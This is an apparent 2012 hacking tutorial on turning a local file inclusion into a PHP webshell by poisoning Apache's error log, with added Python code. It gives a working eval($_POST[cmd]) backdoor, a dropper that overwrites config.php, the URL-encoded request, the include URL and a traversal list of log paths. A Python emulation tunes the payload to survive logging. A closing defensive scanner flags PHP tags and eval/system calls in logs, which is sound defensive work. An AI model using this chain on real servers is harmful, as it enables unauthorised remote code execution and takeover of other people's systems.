PHP include of the Apache log to write a webshell

Posted on 2012-9-15 14:27:40
Because the method above is not very practical: in my testing I found that the log easily runs to tens of megabytes, so that way is no fun to play with. Let's take it one step further and write a genuinely usable webshell, which also beats the painfully slow approach above.

For example, take the same one-liner:
<?eval($_POST[cmd]);?>

By now you may have figured it out: this is a pretty good approach. Read on; how to write the file becomes the question. Use fopen to open the file /home/virtual/www.xxx.com/forum/config.php, then write the server-side one-liner <?eval($_POST[cmd]);?> into it. Put together as a PHP statement:

<?$fp=fopen('/home/virtual/www.xxx.com/forum/config.php','w+');fputs($fp,'<?eval($_POST[cmd]);?>');fclose($fp);?>   //write the one-liner into config.php

Two details of this dropper matter. First, the one-liner is handed to fputs() inside single quotes: in a double-quoted PHP string, "$_POST[cmd]" is interpolated before fputs() ever runs, so config.php would receive <?eval();?> instead of the one-liner. Second, the short open tag <? only works with short_open_tag=On; on a host where it is off, use <?php followed by a space.

We submit this, get Apache to record it in the error log, and then include the log; that writes the shell. It must be URL-encoded to succeed: the encoded form travels through the HTTP request unchanged, and for a 404 Apache writes the decoded path into error_log in its "File does not exist:" message, which is what lets the PHP tags reach the log intact (the request line in access_log is stored as sent, still percent-encoded, so it is of no use for this). Encoded, it becomes:
%3C%3F%24fp%3Dfopen%28%27%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%27%2C%27w%2B%27%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E

We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%27%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%27%2C%27w%2B%27%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E

Now the error log holds the line of code that writes the webshell. Before including it, confirm on the target (by reading the log, if you already have a way to) that the whole decoded payload arrived and that nothing in it was escaped: current Apache versions backslash-escape double quotes and backslashes in error_log entries, which is one more reason to keep the payload free of double quotes.

Next we include the log by submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell is written: config.php now contains the one-liner.
OK.
http://www.xxx.com/forum/config.php is now our webshell; connect to it with Lanker's client and the host is yours.

PS: the precondition for all of the above is that the directory must be writable by the user the web server runs as; -rwxrwxrwx (777) guarantees that, and you can confirm it with ls -ld on the directory listed above. Everything above also assumes you know the log path.
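The chain above, as an added example that is not part of the original post: a Python emulation of what happens to the dropper on its way into the log and what it would write once included. It assumes, as the post does, that httpd writes the full decoded request path into the 404 entry; the escaping of that entry (backslash, double quote and non-printable bytes), the untouched request line in access_log, the client address and the timestamps are emulated and constructed here, not httpd's own code. The docroot is the placeholder used on the page. It also shows what the double-quoted dropper from the original post would actually write into config.php, since PHP interpolates $_POST[cmd] inside double quotes.

```python
from urllib.parse import quote, unquote

# Constructed placeholders, mirroring the ones used on the page.
DOCROOT = "/home/virtual/www.xxx.com"
TARGET = DOCROOT + "/forum/config.php"
ONE_LINER = "<?eval($_POST[cmd]);?>"


def dropper(single_quoted: bool) -> str:
    """Build the dropper that writes ONE_LINER into TARGET.

    single_quoted=False reproduces the original post's version: the one-liner
    sits in a PHP double-quoted string, where PHP interpolates $_POST[cmd]
    before fputs() sees it.  single_quoted=True is the corrected form.
    """
    q = "'" if single_quoted else '"'
    return (f"<?$fp=fopen({q}{TARGET}{q},{q}w+{q});"
            f"fputs($fp,{q}{ONE_LINER}{q});fclose($fp);?>")


def request_path(code: str) -> str:
    """Percent-encode the dropper for use as the request path.  quote() leaves
    letters, digits and _.-~ alone; httpd decodes both spellings identically."""
    return "/" + quote(code, safe="")


def ap_escape_logitem(s: str) -> str:
    """Emulation (not httpd's code) of ap_escape_logitem(): backslash, double
    quote, control and non-ASCII characters are backslash-escaped before httpd
    writes a string into error_log."""
    specials = {"\\": "\\\\", '"': '\\"', "\b": "\\b", "\n": "\\n",
                "\r": "\\r", "\t": "\\t", "\v": "\\v"}
    out = []
    for ch in s:
        if ch in specials:
            out.append(specials[ch])
        elif 0x20 <= ord(ch) < 0x7F:
            out.append(ch)
        else:
            out.append("\\x%02x" % ord(ch))
    return "".join(out)


def error_log_entry(path: str) -> str:
    """Constructed 404 entry: the decoded path mapped under DOCROOT and logged
    as 'File does not exist: <filename>' through the escaping above.  Assumes,
    like the post, that the whole decoded path reaches the log."""
    filename = DOCROOT + unquote(path)
    return ("[Sat Sep 15 14:27:40 2012] [error] [client 10.0.0.1] "
            "File does not exist: " + ap_escape_logitem(filename))


def access_log_entry(path: str) -> str:
    """Constructed combined-format entry: %r is the request line as received,
    still percent-encoded, so PHP would never see '<?' here."""
    return (f'10.0.0.1 - - [15/Sep/2012:14:27:40 +0800] "GET {path} HTTP/1.1" '
            '404 209 "-" "Mozilla/5.0"')


def php_would_execute(code: str, log_line: str) -> bool:
    """include() of the log runs whatever sits between '<?' and '?>' verbatim,
    so the dropper only works if it survived logging byte for byte."""
    return code in log_line


def file_content_after_dropper(single_quoted: bool) -> str:
    """What PHP writes into TARGET when the dropper runs during the include()
    with no POST body present (an emulation of PHP string interpolation)."""
    if single_quoted:
        return ONE_LINER
    return ONE_LINER.replace("$_POST[cmd]", "")  # $_POST['cmd'] unset -> ""


if __name__ == "__main__":
    for sq in (False, True):
        code, path = dropper(sq), request_path(dropper(sq))
        print("single-quoted" if sq else "double-quoted (as on the page)")
        print("  request :", path)
        print("  error   :", error_log_entry(path))
        print("  runs?   :", php_would_execute(code, error_log_entry(path)),
              "/ via access_log:", php_would_execute(code, access_log_entry(path)))
        print("  written :", file_content_after_dropper(sq))
```

Run it and the double-quoted dropper fails twice over: its quotes come out of error_log as \" and, had it run anyway, it would have written <?eval();?>. The single-quoted one survives error_log intact and never reaches the PHP parser through access_log.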
For other log paths you can guess, or refer to this list. The ../ forms are for an include that prepends its own directory to the parameter; the absolute forms are for one that passes it through unchanged.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
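For the defending side, an added example that is not from the original post: a scanner that checks the candidate log locations above for lines PHP would execute if the log were ever pulled into an include, that is a raw or percent-encoded <? open tag, or a call to one of the functions a dropper or one-liner relies on. It goes beyond the post's error_log case and also flags a payload planted through a request header into access_log. The sample log lines are constructed; the path list is the absolute subset of the list above.

```python
import os
import re

# Absolute log locations from the list above; the ../ forms resolve to the same files.
CANDIDATE_LOGS = [
    "/var/log/httpd/access_log", "/var/log/httpd/error_log",
    "/etc/httpd/logs/access_log", "/etc/httpd/logs/error_log",
    "/var/www/logs/access_log", "/var/www/logs/error_log",
    "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/error_log",
    "/var/log/apache/access_log", "/var/log/apache/error_log",
    "/var/log/access_log", "/var/log/error_log",
]

RAW_TAG = re.compile(r"<\?")               # what PHP's parser looks for (short_open_tag)
ENCODED_TAG = re.compile(r"%3c%3f", re.I)  # the same tag as it sits in the %r field of access_log
PHP_CALL = re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec|fopen|fputs|"
                      r"file_put_contents)\s*\(", re.I)


def classify(line):
    """Why a log line is suspicious, or None if it is not."""
    if RAW_TAG.search(line):
        return "php-open-tag"
    if ENCODED_TAG.search(line):
        return "php-open-tag (percent-encoded)"
    if PHP_CALL.search(line):
        return "php-call"
    return None


def scan_lines(lines, source="<input>"):
    """Return (source, line_no, reason, excerpt) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        reason = classify(line)
        if reason:
            hits.append((source, n, reason, line.rstrip("\n")[:120]))
    return hits


def scan_candidate_logs(paths=CANDIDATE_LOGS):
    """Scan whichever candidate logs exist and are readable on this host."""
    hits = []
    for path in paths:
        if not os.path.isfile(path):
            continue
        try:
            with open(path, errors="replace") as fh:
                hits.extend(scan_lines(fh, path))
        except OSError:
            continue  # unreadable as this user; keep scanning the rest
    return hits


# Constructed samples: benign lines next to poisoning attempts.
SAMPLE_ERROR_LOG = [
    "[Sat Sep 15 14:27:40 2012] [error] [client 10.0.0.1] File does not exist: "
    "/home/virtual/www.xxx.com/robots.txt",
    "[Sat Sep 15 14:27:41 2012] [error] [client 10.0.0.1] File does not exist: "
    "/home/virtual/www.xxx.com/<?$fp=fopen('/home/virtual/www.xxx.com/forum/config.php','w+');"
    "fputs($fp,'<?eval($_POST[cmd]);?>');fclose($fp);?>",
]
SAMPLE_ACCESS_LOG = [
    '10.0.0.1 - - [15/Sep/2012:14:27:40 +0800] "GET /index.php HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
    '10.0.0.1 - - [15/Sep/2012:14:27:42 +0800] "GET /%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E '
    'HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '10.0.0.1 - - [15/Sep/2012:14:27:43 +0800] "GET / HTTP/1.1" 200 4821 "-" "<?php system($_GET[c]); ?>"',
]

if __name__ == "__main__":
    for src, lines in (("error_log", SAMPLE_ERROR_LOG), ("access_log", SAMPLE_ACCESS_LOG)):
        for hit in scan_lines(lines, src):
            print("%s:%d %s: %s" % hit)
    for hit in scan_candidate_logs():  # the real logs on this host, if any are readable
        print("%s:%d %s: %s" % hit)
```

A hit on a raw open tag in error_log is the post's own technique in progress; a percent-encoded tag in the request line is the same attempt that could not execute there, and a raw tag in the User-Agent field is the access_log variant. Any hit is a reason to rotate the log out of reach of the web server's include path and to look for the LFI that would make it executable.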